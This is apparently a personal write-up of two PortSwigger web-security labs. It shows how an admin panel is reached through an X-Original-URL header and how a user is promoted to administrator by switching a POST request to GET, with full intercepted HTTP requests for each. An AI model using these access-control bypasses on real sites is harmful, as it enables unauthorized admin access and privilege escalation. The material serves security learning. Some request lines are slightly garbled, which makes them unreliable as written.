Lab: URL-based access control can be circumvented
This website has an unauthenticated admin panel at
/admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports theX-Original-URLheader.
To solve the lab, access the admin panel and delete the usercarlos.
Link to lab: https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented
When trying to access the Admin panel via the front end system, we get “access denied”. When intercepting the request it looks like:
GET /admin HTTP/1.1
Host: 0a4100100341d6af81f4bb30009d00ae.web-security-academy.net
Cookie: session=57EynBodRDJEQ7CmkwnYzAR2kh24whYR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a4100100341d6af81f4bb30009d00ae.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive What we did was replace
GET /admin HTTP/1.1for
POST HTTP/2 HTTP/2
X-Original-Url: /admin/And this led us to the admin panel in the response. From there we can use the information to delete the carlos username (/admin/delete?username=carlos)
Lab: Method-based access control can be circumvented
This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials
administrator:admin.
To solve the lab, log in using the credentialswiener:peterand exploit the flawed access controls to promote yourself to become an administrator.
Link to lab: https://portswigger.net/web-security/access-control/lab-method-based-access-control-can-be-circumvented
Using the admin credentials we see that the role upgrade request looks like this:
POST /admin-roles HTTP/2
Host: 0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Cookie: session=jzjXTYjlxHZIyKGW4a1IEsYfwHruxGZU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Referer: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=carlos&action=upgradeTrying to use the same request from wiener’s user is not feasible, you get “Unauthorized”. Instead I replaced the POST method for GET changing
POST /admin-roles HTTP/2for
GET /admin-roles?username=wiener&action=upgrade HTTP/2(Easier way of doing it I didn’t know: right-clicking and selecting “Change request method”.)